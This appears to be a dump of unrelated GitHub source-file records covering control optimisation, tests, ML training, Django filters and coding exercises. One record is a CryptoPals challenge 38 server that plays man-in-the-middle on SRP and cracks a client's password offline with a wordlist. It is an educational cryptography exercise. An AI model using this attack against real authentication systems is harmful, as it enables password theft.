cycle\nwith open(current_directory+'/cycle.csv', 'r') as csvfile:\n cycle_dat = list(csv.reader(csvfile,delimiter = ','))[0]\n cycle_dat = [float(s) for s in cycle_dat]\n cycle_dat = cycle_dat[10:]\n\n\n# resolution of the time discretization\ndt = 1\n# start time\nstart = 7\n# length of the considered time window\nwl = len(cycle_dat)-start-1 # int(min(200,len(cycle_dat)-start-1))\n\ncycle_base = cs.DM(cycle_dat[start:wl+start+1])\nt_base = np.linspace(0,wl,wl+1)\nf = interp1d(np.squeeze(t_base),np.squeeze(cycle_base),axis=0)\n\nn_Steps = wl/dt\ntime_vec = t_base[0] + cs.DM([t for t in range(int(n_Steps+1))])*(t_base[-1]-t_base[0])/n_Steps\ncycle_dat = cs.DM(f(time_vec))\ndcycle_dat = cs.vertcat((cycle_dat[1:]-cycle_dat[:-1])/(time_vec[1:]-time_vec[:-1]),0)\n\n\n# ------------------------------------------------\n# Model\n# ------------------------------------------------\n\n# temporary variables\nw = cs.MX.sym('w')\nP = cs.MX.sym('P')\nPrat = cs.MX.sym('Prat')\nErat = cs.MX.sym('Erat')\nSoC = cs.MX.sym('Erat')\n\n# ICE\nICE_wrat = 6000*np.pi/30\nICE_data = engine()\nICE_dFin = cs.Function('ICE_dFin', [Prat,w,P], [ICE_data['dFin'](ICE_wrat,1000*Prat,w,1000*P)])\nICE_Fstart = cs.Function('ICE_Fstart', [Prat], [ICE_data['Fstart'](1000*Prat)])\nICE_Pmax = cs.Function('ICE_Pmax', [Prat,w], [ICE_data['Pmax'](ICE_wrat,1000*Prat,w)*1e-3])\nICE_mass = cs.Function('ICE_mass', [Prat], [ICE_data['mass'](1000*Prat)])\nICE_minw = max(ICE_data['minw'](ICE_wrat),1000*np.pi/30)\n\n# EM\nEM_wrat = 10000*np.pi/30\nEM_data = electric_motor()\nEM_Pin = cs.Function('EM_Pin', [Prat,w,P], [EM_data['Pin'](EM_wrat,1000*Prat,w,1000*P)*1e-3])\nEM_Pmax = cs.Function('EM_Pmax',[Prat,w], [EM_data['Pmax'](EM_wrat,1000*Prat,w)*1e-3])\nEM_mass = cs.Function('EM_mass',[Prat], [EM_data['mass'](1000*Prat)])\n\n# battery\nBT_data = battery()\nSoC_max = BT_data['SoC_max']\nSoC_min = BT_data['SoC_min']\nBT_dSoC = cs.Function('BT_dSoC',[Erat,SoC,P], [BT_data['dSoC'](Erat*3.6e6,SoC,1000*P)])\nBT_Pout = cs.Function('BT_Pout',[Erat,SoC,P], [BT_data['Pout'](Erat*3.6e6,SoC,1000*P)*1e-3])\nBT_Pmax = cs.Function('BT_Pmax',[Erat,SoC], [BT_data['Pmax'](Erat*3.6e6,SoC)*1e-3])\nBT_Pmin = cs.Function('BT_Pmin',[Erat,SoC], [BT_data['Pmin'](Erat*3.6e6,SoC)*1e-3])\nBT_mass = cs.Function('BT_mass',[Erat], [BT_data['mass'](Erat*3.6e6)])\n\n\n# model parameters\nbase_mass = 800\nfrictionCoeff = 0.005\nwheelR = 0.285\ndrag_area = 2\nair_density = 1.225\ndrag_coeff = .35\nreferece_speeds = [15,30,55,85,115]\nreference_RPM = 2500\nR = [(reference_RPM*np.pi/30)/((referece_speeds[k]/3.6)/wheelR) for k in range(len(referece_speeds))]\nRem = (3000*np.pi/30)/((60/3.6)/wheelR)\nICE_Prat = 55\nEM_Prat = 25\nBT_Erat = 1.024 #kWh\nTNK_Frat = 30000\nTNK_Finit = TNK_Frat/2\nSoC_opt = SoC_min + 0.75*(SoC_max - SoC_min)\nSoC_start = SoC_min + 0.1*(SoC_max - SoC_min)\n\n\n# ------------------------------------------------\n# Problem definition\n# ------------------------------------------------\n\n# create optimal control model\nmodel = oc.OCmodel('Parallel Hybrid Drivetrain')\n\n# external inputs\nmodel.i = [oc.input('cycle',cycle_dat), oc.input('dcycle',dcycle_dat)]\ncycle = model.i[0].sym\ndcycle = model.i[1].sym\nSoCcoeff = oc.input('SoCcoeff',oc.DM.zeros(time_vec.numel()))\nmodel.i.append(SoCcoeff)\n\n# differential states\nSoC = oc.variable('SoC',SoC_min,SoC_max,SoC_start)\nFuel = oc.variable('F',0,TNK_Frat,TNK_Finit)\nmodel.x = [SoC,Fuel]\n\n# instantaneous transition states\nOFFstate = oc.variable('OFFstate',0,1,1)\nGEARstate = oc.variable('GEARstate',0,5,0)\nmodel.y = [OFFstate,GEARstate]\n\n# algebraic variables\nmodel.a = []\n\n# continuous controls\ndFuel = oc.variable('dF',0,20.0,0)\nPb = oc.variable('Pb',BT_Pmin(BT_Erat,1.0),BT_Pmax(BT_Erat,1.0),0)\nPice = oc.variable('Pice',0,ICE_Prat,0)\nPem = oc.variable('Pem',-EM_Prat,EM_Prat,0)\nswitch = oc.variable('switch',0,oc.inf,0)\nmodel.u = [dFuel,Pice,Pb,Pem,switch]\n\n#discrete controls\nOFF = oc.variable('OFF',0,1,1)\nG = [oc.variable('G'+str(k+1),0,1,int(k==0)) for k in range(len(R))]\nmodel.v = [OFF] + G\n\n# ode\nmodel.ode = [BT_dSoC(BT_Erat,SoC.sym,Pb.sym),-dFuel.sym]\n\n# instantaneous transitions\ngear = sum([(k+1)*G[k].sym for k in range(len(R))])\nmodel.itr = [OFF.sym-OFFstate.sym, gear-GEARstate.sym]\n\n# precalculations\nmass = base_mass + ICE_mass(ICE_Prat) + EM_mass(EM_Prat) + BT_mass(BT_Erat)\nFreq = mass*dcycle+.5*air_density*drag_coeff*drag_area*cycle**2\nTreq = Freq*wheelR\nPaux = 0.3 # accessory power load kW\nPreq = Freq*cycle/1000\n\n\nwem = Rem*cycle/wheelR\nwice = sum([G[k].sym*R[k]*cycle/wheelR for k in range(len(R))])\nGEAR_ = sum([(k+1)*G[k].sym for k in range(len(R))])\n\n# path constraints\nmodel.pcns = [oc.geq(Pem.sym+Pice.sym,Preq)]+\\\n \\\n [oc.eq(sum([G[k].sym for k in range(len(R))]) + OFF.sym,1)]+\\\n [oc.leq(OFF.sym-OFFstate.sym, switch.sym)]+\\\n [oc.geq(OFF.sym-OFFstate.sym,-switch.sym)]+\\\n [oc.leq(GEAR_-GEARstate.sym, 5*switch.sym)]+\\\n [oc.geq(GEARstate.sym-GEAR_,-5*switch.sym)]+\\\n \\\n [oc.leq(wice,ICE_wrat*0.5)]+\\\n [oc.leq(ICE_minw*(1-OFF.sym),wice)]+\\\n [oc.leq(Pice.sym,ICE_Prat*(1-OFF.sym))]+\\\n [oc.leq(Pice.sym,ICE_Pmax(ICE_Prat,wice)[k]) for k in range(ICE_Pmax(0,0).numel())]+\\\n [oc.leq(ICE_dFin(ICE_Prat,wice,Pice.sym)[k]-OFF.sym*ICE_dFin(ICE_Prat,0,0)[k],dFuel.sym) for k in range(ICE_dFin(0,0,0).numel())]+\\\n \\\n [oc.leq(Pb.sym,BT_Pmax(BT_Erat,SoC.sym))]+\\\n [oc.geq(Pb.sym,BT_Pmin(BT_Erat,SoC.sym))]+\\\n [oc.leq(EM_Pin(EM_Prat,wem,Pem.sym)[k] + Paux,BT_Pout(BT_Erat,SoC.sym,Pb.sym)) for k in range(EM_Pin(0,0,0).numel())]+\\\n \\\n [oc.leq(Pem.sym, EM_Prat)]+\\\n [oc.geq(Pem.sym,-EM_Prat)]\n\n# sos1 constraints\n# model.sos1 = [oc.sos1_constraint([v.nme for v in G]+['OFF'],cs.vertcat(*[r.sym for r in R]+[0]))]\n\n# objective\nmodel.lag = (0.4*45.6*dFuel.sym+Pb.sym)\nmodel.ipn = 0.4*45.6*ICE_Fstart(ICE_Prat)*switch.sym\nmodel.may = 200*(-cs.log((SoC.sym-SoC_min)/(SoC_max-SoC_min)) - cs.log((SoC_max-SoC.sym)/(SoC_max-SoC_min)) + 2*cs.log(.5))\n\n# model.may = (200*BT_Erat*SoCcoeff.sym*(1-SoC.sym))**2 # 200g/kWh is the maximum theoretical efficiency for engines\nmodel.epigraph_reformulation(max_orders = [1,1,2],integration_opts={'schema':'rk4','n_steps':1})\n\nprint(model)\nprint('\\n---------------------------------------------------------------------------------')\n\n\n# ------------------------------------------------\n# MPC procedure\n# ------------------------------------------------\n\n# define expression for SoCcoeff\nSoCcoeff_f = cs.Function('SoCcoeff',[v.sym for v in model.x+model.y],[1.0 - (SoC_max-SoC_min)/(SoC_max-SoC.sym + SoC_max-SoC_min)],\n [v.nme for v in model.x+model.y],['out'])\n\n# main parameters\nRTL = 0 # relaxed tail length\nPHL = 18 # prediction window length\nshift_size = 1\nnum_iterations = 12\nsubsolverName = 'CLP'\nconservativism_level = 2\nnlpProcesses = 1\nmipProcesses = 1\nshift_style = None\nshift_style = \"constraintsOnly\"\n# shift_style = \"warmStart\"\n# shift_style = \"fullRTI\"\n\nmpc_options = {'max_iteration_time':oc.inf,\n 'hbbSettings':{'verbose':True,'conservativismLevel':conservativism_level,\"relativeGapTolerance\":1e-4,\n 'nlpProcesses':nlpProcesses,'mipProcesses':mipProcesses,'nlpStepType':('OAnlpStep',),\n 'nlpSettings':{'subsolverName':'IPOPT','constr_viol_tol':1e-5},\n 'mipSettings':{'verbose':True,\n 'withBoundsPropagation':False,\n 'subsolverSettings':{'subsolverName':subsolverName}}},\n 'integration_opts':{'schema':'rk4','n_steps':1},\n 'prediction_horizon_length':PHL,'relaxed_tail_length':RTL,\n 'printLevel':1}\n\n\n\n# generate the mpc controller\nmpc_controller = oc.MPCcontroller(model,mpc_options)\n\n# define the first measured state\nmeasured_state = {'SoC':SoC_start,'F':TNK_Finit,'OFFstate':1.0,'GEARstate':0.0}\n\n# collect the first parameters values\nnew_input_values = {'t':time_vec[:PHL+RTL+1],\n 'cycle':cycle_dat[:PHL+RTL+1],\n 'dcycle':dcycle_dat[:PHL+RTL+1],\n 'SoCcoeff':SoCcoeff_f.call(measured_state)['out']*cs.DM.ones(PHL+RTL+1)}\n\n# create container for results\nresults = {'t':cs.DM(list(range(num_iterations-1+PHL+1)))};\nfor i in model.i: results[i.nme] = cs.DM.zeros(num_iterations-1+PHL+1)\nfor v in model.x + model.y + model.a: results[v.nme] = cs.DM.zeros(num_iterations-1+PHL+1)\nfor v in model.u+model.v: results[v.nme] = cs.DM.zeros(num_iterations-1+PHL)\n\n\n# MPC iterations\nk0 = 0\nstart_time = time()\nfor i in range(num_iterations):\n\n print('MPC: Iteration =',i+1)\n\n # perform mpc iteration\n iteration_objective, iteration_results = mpc_controller.iterate(shift_size,measured_state,new_input_values,shift_style,0)\n\n print(\"MPC: Optimal Objective =\",iteration_objective)\n\n # fill in the newest results\n for v in model.x + model.y + model.a:\n results[v.nme][k0:k0+PHL+1] = iteration_results[v.nme][:PHL+1]\n for v in model.u + model.v:\n results[v.nme][k0:k0+PHL] = iteration_results[v.nme][:PHL]\n\n # update the initial timestep\n k0 += shift_size\n\n # update the measured state\n for v in model.x: measured_state[v.nme] = results[v.nme][k0]\n for v in model.y: measured_state[v.nme] = round(float(results[v.nme][k0]))\n\n # update the input values\n new_input_values = {'t':time_vec[k0+PHL+RTL:k0+PHL+RTL+shift_size],\n 'cycle':cycle_dat[k0+PHL+RTL:k0+PHL+RTL+shift_size],\n 'dcycle':dcycle_dat[k0+PHL+RTL:k0+PHL+RTL+shift_size],\n 'SoCcoeff':SoCcoeff_f.call(measured_state)['out']*cs.DM.ones(shift_size)\n }\n\nprint('\\n---------------------------------------------------------------------------------')\nprint('Solution time: ',time()-start_time)\nprint('Timings: ',mpc_controller.stats['times'])\nprint('#Solves: ',mpc_controller.stats['num_solves'])\nprint('---------------------------------------------------------------------------------\\n')\n\n\n# ------------------------------------------------\n# Plot Results\n# ------------------------------------------------\nfig_name = 'MIRTOC_'+str(start)+':'+str(dt)+':'+str(start+wl)\n\n\ntime_vec = results['t']\nTreq_f = cs.Function('Treq',[cs.vertcat(*[i.sym for i in model.i])],[Treq])\nTreq_f = Treq_f.map(time_vec.numel())\nTreq_v = Treq_f(oc.list_horzcat([results[i.sym.name()] for i in model.i]).T).T\n\nfor k in range(len(R)):\n results['R'+str(k+1)] = R[k]\nresults['Rem'] = Rem\n\nplt.close(fig_name)\nfig = plt.figure(fig_name)\n\n\nbase_font ={'family' : 'sans','size' : 12}\nmpl.rc('font', **base_font)\nfont_titles = {'rotation':'vertical','fontsize':18,'va':'center','ha':'center','weight':'bold'}\nfont_units = {'rotation':'vertical','fontsize':14,'va':'center','ha':'center'}\nfont_results = {'weight':'bold','size':20,'ha':'center','va':'center'}\n\ntext_space = 0.015\nx0 = 0.15\nxf = .85\ny0 = 0.09\nyf = 0.99\n\nn_plots = 5\n\nrem = results['Rem']\nrice = sum([results['R'+str(i+1)]*results['G'+str(i+1)] for i in range(len(R))])\nwr = cycle_dat[:time_vec.numel()]/wheelR\ndsc_labels = ['OFF','G1','G2','G3','G4','G5']\n\n# base layout\nax_ = fig.add_axes([x0+2*text_space,y0,(xf-x0)-6*text_space,yf-y0],frameon = True)\nax_.xaxis.set_visible(True)\nax_.yaxis.set_visible(False)\nax_.set_ylim([0,1])\nax_.grid(axis='x')\nax_.autoscale(enable=True,axis='x',tight=True)\nax_.patch.set_alpha(0)\n\n# prepare the space\nunits = []\ntitles = []\nax = []\nfor p in range(n_plots):\n ax.append(fig.add_axes([x0+2*text_space,y0 + p*(yf-y0)/n_plots,(xf-x0)-6*text_space,(yf-y0)/n_plots],sharex=ax_,frameon = False))\n ax[-1].yaxis.set_visible(True)\n ax[-1].xaxis.set_visible(False)\n ax[-1].set_axisbelow(True)\n ax[-1].patch.set_alpha(0)\n ax[-1].yaxis.tick_right()\n ax[-1].yaxis.set_label_position('right')\n ax[-1].grid(axis='y')\n ax[-1].autoscale(enable=True,axis='x',tight=True)\n titles.append('')\n units.append('')\n\n# powers\ndata2 = results['Pem']\ndata3 = results['Pice']\ndata1 = data2 + data3\n\nmin_data = oc.dm_min(cs.vertcat(data1,data2,data3))\nmax_data = oc.dm_max(cs.vertcat(data1,data2,data3))\nticks_period = 10\n\nyticks = [ticks_period*t for t in range(int(oc.dm_round(min_data/ticks_period+.1)),int(oc.dm_round(max_data/ticks_period-.1))+1)]\nax[4].set_yticks(yticks)\nax[4].set_ylim(min(yticks)-.6*ticks_period,max(yticks)+.6*ticks_period)\ntitles[4] = 'Powers'\nunits[4] = 'kW'\n\nax[4].step(time_vec,cs.vertcat(data1[0],data1), label = 'Requested', color='k',linewidth=2)\nax[4].step(time_vec,cs.vertcat(data2[0],data2), label='EM',linewidth=2,color=(0,0,0.7))\nax[4].step(time_vec,cs.vertcat(data3[0],data3), label='ICE (after GB)',linewidth=2,color=(0.9,0,0))\n\nax[4].legend(loc='upper left',ncol = 3,fontsize = 14)\n\n\n# speeds\ndata1 = wr[:-1]*rem*30/np.pi\ndata2 = wr[:-1]*rice*30/np.pi\ndata3 = ICE_wrat*cs.DM.ones(wr.numel()-1,1)*30/np.pi\n\n\nmin_data = oc.dm_min(cs.vertcat(data1,data2))\nmax_data = oc.dm_max(cs.vertcat(data1,data2))\n\nif max_data > 2000:\n ticks_period = 1000\nelse:\n ticks_period = 500\n\n\nyticks = [ticks_period*t for t in range(int(oc.dm_round(min_data/ticks_period+.1)),int(oc.dm_round(max_data/ticks_period-.1))+1)]\nax[3].set_yticks(yticks)\nax[3].set_ylim(min(yticks)-.6*ticks_period,max(yticks)+.6*ticks_period)\ntitles[3] = 'Speeds'\nunits[3] = 'RpM'\n\nax[3].step(time_vec,cs.vertcat(data1[0],data1), label='EM',linewidth=2,color=(0,0,0.7))\nax[3].step(time_vec,cs.vertcat(data2[0],data2), label='ICE (before GB)',linewidth=2,color=(0.9,0,0))\nax[3].legend(loc='upper left',ncol = 3,fontsize = 14)\n\n# SoC\ndata = 100*results['SoC']\nmin_data = oc.dm_min(data);\nmax_data = oc.dm_max(data)\nticks_period = int(2*(max_data-min_data)+.5)/10\n\nyticks = [ticks_period*t for t in range(int(oc.dm_round(min_data/ticks_period+.1)),int(oc.dm_round(max_data/ticks_period-.1))+1)]\nax[2].set_yticks(yticks)\nax[2].set_ylim(min(yticks)-.6*ticks_period,max(yticks)+.6*ticks_period)\ntitles[2] = 'SoC'\nunits[2] = '%'\n\nax[2].plot(oc.squeeze(time_vec),oc.squeeze(data),linewidth=2,color=(.4,.6,0))\n\n\n# discrete variables\ndsc_ass = cs.DM()\nfor i,l in enumerate(dsc_labels):\n dsc_ass = oc.horzcat(dsc_ass,results[l])\n\n\n\nax[1].set_ylim(-.5,len(dsc_labels)+.5)\nyticks = [0] + [t+1 for t in range(len(dsc_labels))]\nax[1].set_yticks(yticks)\nax[1].set_ylim(min(yticks)-.5,max(yticks)+.5)\nax[1].set_yticklabels('')\nax[1].set_yticks([t +.5 for t in range(len(dsc_labels))],minor=True)\nax[1].set_yticklabels(dsc_labels,minor=True)\n\ntitles[1] = 'Discrete C.'\n\n\ncmap = cm.nipy_spectral\ncolors = [(.2,.2,.2)] +[cmap(int(i*cmap.N/len(dsc_labels))) for i in range(1,len(dsc_labels))]\n\nfor i in range(len(dsc_labels)):\n for t in range(time_vec.numel()-1):\n if dsc_ass[t,i] > 1e-4:\n ax[1].add_patch(ptc.Rectangle(xy=(time_vec[t],i),width=time_vec[t+1]-time_vec[t],height=dsc_ass[t,i],facecolor=colors[i],edgecolor='k',fill=True))\n ax_.add_patch(ptc.Rectangle(xy=(time_vec[t],0),width=time_vec[t+1]-time_vec[t],height=1,facecolor=list(colors[i])[:3]+ [float(.1*dsc_ass[t,i])],edgecolor='none',fill=True))\n\n\n# driving cycle\ndata = 3.6*cycle_dat[:time_vec.numel()]\nmin_data = oc.dm_min(data)\nmax_data = oc.dm_max(data)\nticks_period = 10\n\nyticks = [ticks_period*t for t in range(int(oc.dm_round(min_data/ticks_period+.1)),int(oc.dm_round(max_data/ticks_period-.1))+1)]\nax[0].set_yticks(yticks)\nax[0].set_ylim(min(yticks)-.6*ticks_period,max(yticks)+.6*ticks_period)\ntitles[0] = 'Cycle'\nunits[0] = 'km/h'\n\nax[0].plot(time_vec,data,linewidth=2,color='k')\n\nax0 = fig.add_axes([0,0,1,1],frameon=False)\nfor p in range(n_plots):\n rect = ptc.Rectangle(xy=(x0,y0+p*(yf-y0)/n_plots),width=xf-x0,height=(yf-y0)/n_plots,facecolor='w',edgecolor='k',fill=False)\n ax0.add_patch(rect)\n ax0.text(x0+text_space,y0+(p+.5)*(yf-y0)/n_plots,titles[p],font_titles)\n ax0.text(xf-text_space,y0+(p+.5)*(yf-y0)/n_plots,units[p],font_units)\n\n\nplt.savefig(\"figure.png\")\nplt.show()\n# manager = plt.get_current_fig_manager()\n# manager.window.showMaximized()\n","repo_name":"MassimoDM/MIRT_OC","sub_path":"examples/parallel_hybrid_power/parallel_hybrid_power.py","file_name":"parallel_hybrid_power.py","file_ext":"py","file_size_in_byte":16953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"62920919","text":"import yatest.common\nimport yaml\n\n\ndef test_versions_format():\n \"\"\"\n test that versions.sls is Dict[str, Dict[str, str]]\n \"\"\"\n with open(yatest.common.source_path('cloud/mdb/salt/pillar/versions.sls')) as inp:\n versions = yaml.safe_load(inp)\n assert isinstance(versions, dict), 'versions.sls should be a dict'\n for env, env_pins in versions.items():\n assert isinstance(env, str), f'env key should be a str. got {env!r}'\n assert isinstance(env_pins, dict), f'{env} value should be a dict'\n for component, pin in env_pins.items():\n assert isinstance(component, str), f'component should be a str. got {component!r}'\n assert isinstance(pin, str), f'pin should be a str. got {pin!r} for {component!r}'\n if pin == 'trunk':\n continue\n assert pin.isdigit(), f'pin {pin!r} for {component!r} should be \\'trunk\\' or svn revision'\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"cloud/salt-tests/versions/test_versions_format.py","file_name":"test_versions_format.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37612173613","text":"import ast\n# import astpretty\n\n\nx=\"1+12+3\"\n\n# 1*2*3+5\n\nexp=[]\n\nprev=\"\"\ncurr=\"\"\n\nfor i in x:\n # print (i)\n if(i.isdigit()):\n if(prev.isdigit()):\n curr=curr+i\n else:\n curr=i\n else:\n exp.append(int(curr))\n curr=\"\"\n exp.append(i)\n prev=i\n\nexp.append(curr)\n\nprint(exp)\n\nprint(exp[0]+10)\nif(exp[1]==\"+\"):\n print(True)\n\n\n\nclass AST():\n pass\n\n\nclass BinOp(AST):\n def __init__(self, left, op, right):\n self.left = left\n self.right = right\n self.op=op\n\n\nclass Num(AST):\n def __init__(self, value):\n self.value = value\n\n\n\n","repo_name":"terrasjones42/Arith","sub_path":"Tinker.py","file_name":"Tinker.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5906144481","text":"import collections as _collections\n\nimport os\n\nstate = {\n # Previous interaction with the file-system is recorded here,\n # for reuse in subsequent calls to a function holding SHIFT\n \"history\": {},\n\n # Host plug-ins are recorded for automatic uninstall\n \"pluginsLoaded\": set(),\n\n # Reloader modules\n \"registeredModules\": _collections.OrderedDict(),\n\n \"teardown\": [],\n\n}\n\n\ndef unload():\n \"\"\"Unload every module\n\n This enables re-import of this package without restarting the\n interpreter, whilst also accounting for import order to avoid/bypass\n cyclical dependencies.\n\n \"\"\"\n\n import sys # Local import, to prevent leakage\n\n for key, value in sys.modules.copy().items():\n if key.startswith(__name__):\n sys.modules.pop(key)\n","repo_name":"ue4plugins/MayaMLDeformer","sub_path":"Source/MLDeformer/mldeformer/generator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"37886435437","text":"\"\"\"\nmountain_car_continuous_ddpg.py\n\"\"\"\n\nimport gym\nfrom ddpg import DDPG\nimport numpy as np\n\n\nNUM_EPISODES = 3000\nMAX_IT = 1000\nRENDER_FLAG = True\n\nif __name__ == '__main__':\n env = gym.make('MountainCarContinuous-v0')\n #env = gym.make('Pendulum-v0')\n #env = gym.make('CartPole-v1') # Discrete case\n ddpg_agent = DDPG(env, device='/GPU:0')\n ddpg_agent.run(NUM_EPISODES, MAX_IT, RENDER_FLAG)\n #ddpg(env, n_episodes=NUM_EPISODES, max_t=MAX_IT)\n\n","repo_name":"EmanueleGiacomini/rl_ddpg","sub_path":"mountain_car_continuous_ddpg.py","file_name":"mountain_car_continuous_ddpg.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27067032076","text":"#!/usr/bin/python3\n\"\"\"\nWrite a function that takes a comma-separated string\nand returns a last element (separated by a last comma)\nor the entire string if there is no comma in it.\n\"\"\"\n\n\ndef split_string(input_str):\n \"\"\"\n Parse input string and returns last comma separated element.\n In case no comma found, all string is returned.\n\n Args:\n input_str(str): input string that will be parsed\n\n Returns:\n str: last comma separated element,\n or all string in case no comma found.\n \"\"\"\n return input_str.split(',')[-1]\n\n\nif __name__ == '__main__':\n print(split_string(\"some, comma, separated, string.\"))\n print(split_string(\"some string without comma.\"))","repo_name":"mstepovanyy/python-training","sub_path":"course/lesson03/task05/advanced_string_splitting.py","file_name":"advanced_string_splitting.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23771526531","text":"from pals33 import modular_pow\r\nfrom pals36 import hmac_sha256, h\r\nfrom flask import Flask, request, jsonify\r\nfrom hashlib import sha256\r\nfrom random import randint\r\nimport requests\r\n\r\n\r\n# Set 5 Challenge 38 Server\r\n# Made with OpenSSL\r\nN = int(\"008c5f8a80af99a7db03599f8dae8fb2f75b52501ef54a827b8a1a586f14dfb20d6b5e2ff878b9ad6bca0bb9\"\r\n \"18d30431fca1770760aa48be455cf5b949f3b86aa85a2573769e6c598f8d902cc1a0971a92e55b6e04c4d07e\"\r\n \"01ac1fa9bdefd1f04f95f197b000486c43917568ff58fafbffe12bde0c7e8f019fa1cb2b8e1bcb1f33\", 16)\r\n\r\n# Client & server check these\r\ng = 2\r\nk = 3\r\n\r\n# Server computes these vals\r\nb = randint(0, N - 1)\r\nB = modular_pow(g, b, N)\r\nsalt = str(randint(0, 2**32 - 1))\r\n\r\n# Values -> update later\r\nv = None\r\nA = None\r\nS, K = None, None\r\n\r\napp = Flask(__name__)\r\n\r\n# MITM attack to SRP\r\n@app.route('/', methods=['POST'])\r\ndef mitm_attack():\r\n global v, A, B, S, K\r\n\r\n if request.method == 'POST':\r\n # Get data sent by client as json\r\n post_data = request.get_json()\r\n\r\n # If we are in first (C->S) post:\r\n if 'I' in post_data and 'A' in post_data:\r\n # Get I & A sent by client\r\n I = post_data.get('I')\r\n A = post_data.get('A')\r\n\r\n # Send user salt & B (first S->C)\r\n return jsonify(salt=salt, B=B)\r\n\r\n # If we are in second (C->S) post:\r\n elif 'hm' in post_data:\r\n\r\n # Get client HMAC\r\n client_hm = post_data.get('hm')\r\n\r\n # Add words from website with 10,000 words\r\n with open(\"10kwords\") as dictionary:\r\n candidates = dictionary.readlines()\r\n\r\n # Try password candidates\r\n for candidate in candidates:\r\n\r\n # Strip word\r\n candidate = candidate.rstrip()\r\n\r\n # Compute u\r\n u = h(str(A) + str(B))\r\n v = modular_pow(g, h(salt + candidate), N)\r\n\r\n # Compute S & K\r\n S = modular_pow(A * modular_pow(v, u, N), b, N)\r\n K = sha256(str(S).encode()).digest()\r\n\r\n # Compute HMAC\r\n candidate_hm = hmac_sha256(K, salt.encode())\r\n\r\n if candidate_hm == client_hm:\r\n print(\"The password is:\", candidate)\r\n return \"OK\", 200\r\n\r\n return \"BAD\", 500\r\n\r\n\r\n# Main Function\r\nif __name__ == '__main__':\r\n \"\"\"CryptoPals Set 5 #38 Server\"\"\"\r\n \"\"\"Brute force attack, can have long delay\"\"\"\r\n app.run()\r\n","repo_name":"jomens235/cryptography_challenges-cryptopals","sub_path":"Set 5/pals38_server.py","file_name":"pals38_server.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"600331903","text":"# Quiz\r\nfrom random import *\r\na = list(range(1,51))\r\nb = sample(list(range(5,51)),1)\r\nx = a[0]\r\ny = b[0]\r\n\r\n\r\nx = 0\r\nfor y in list(range(1,51)) :\r\n z = sample(range(5,51),1)\r\n if 5<=z[0]<=15 :\r\n print(\"[o]{0}번째 손님 (소요시간 : {1}분\".format(y,z[0]))\r\n x=x+1\r\n else:\r\n print(\"[]{0}번째 손님 (소요시간 : {1}분\".format(y,z[0]))\r\n\r\n\r\nprint(x,end=\"명\") \r\n \r\n \r\n \r\n","repo_name":"hsy0511/0315-python","sub_path":"0315-15.py","file_name":"0315-15.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"403235510","text":"# URI Online Judge | 1221\nfrom math import sqrt\nN = int(input())\nfor i in range (N):\n num = int(input())\n if num > 1:\n resultado = 'Prime'\n for d in range(2, int(sqrt(num)+1)):\n if num % d == 0:\n resultado = 'Not Prime' # se tiver algum divisor entre 2 e a raiz quadrada, é composto\n print(resultado)","repo_name":"sammycosta/uri-python","sub_path":"uri_1221.py","file_name":"uri_1221.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16341821934","text":"import django_filters\nfrom rest_framework import filters\n\nfrom pentest_project.models import Action\n\n\nclass ArrayFilter(django_filters.CharFilter):\n def __init__(self, field_name=None, lookup_expr='contains', *, label=None,\n method=None, distinct=False, exclude=False, **kwargs):\n super().__init__(field_name=field_name, lookup_expr=lookup_expr, label=label,\n method=method, distinct=distinct, exclude=exclude, **kwargs)\n\n def filter(self, qs, value):\n if value:\n value = value.split(',')\n else:\n value = []\n return super().filter(qs, value)\n\n\nclass ActionFilter(django_filters.FilterSet):\n status__in = ArrayFilter(field_name='status', lookup_expr='in')\n id__in = ArrayFilter(field_name='id', lookup_expr='in')\n\n class Meta:\n model = Action\n fields = ('parent', 'parent', 'project', 'status', 'created_at', 'updated_at')\n\n\nclass FileTomlSearchFilter(filters.SearchFilter):\n def filter_queryset(self, request, queryset, view):\n search_terms = self.get_search_terms(request)\n if not search_terms:\n return queryset\n search_term = search_terms[0].lower()\n return list(filter(lambda x: search_term in x.filename.lower() or search_term in x.name.lower(), queryset))\n","repo_name":"Nekmo/pentest-studio","sub_path":"pentest_project/api/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"21143789179","text":"import sys\ninput = sys.stdin.readline\n\nN = int(input())\nstairs = [0]\n\nfor _ in range(N):\n stairs.append(int(input()))\n\nmemo = [0] * (N+1)\nmemo[1] = stairs[1]\nmemo[2] = stairs[1] + stairs[2]\nif N == 1:\n print(stairs[1])\nelif N == 2:\n print(stairs[2])\nelse:\n for i in range(3, N+1):\n memo[i] = max(memo[i-2], stairs[i-1]+memo[i-3]) + stairs[i]\n \n print(memo[-1])","repo_name":"ratataca/algorithm-study","sub_path":"week 10. DP & 파싱(문자열 처리)/백준/1. 2579 계단오르기/ratataca.py","file_name":"ratataca.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"10131978457","text":"import os\nimport message\n\nfrom slackclient import SlackClient\n\nauthed_teams = {}\n\nclass Script(object):\n\n def __init__(self):\n super(Script, self).__init__()\n self.name = 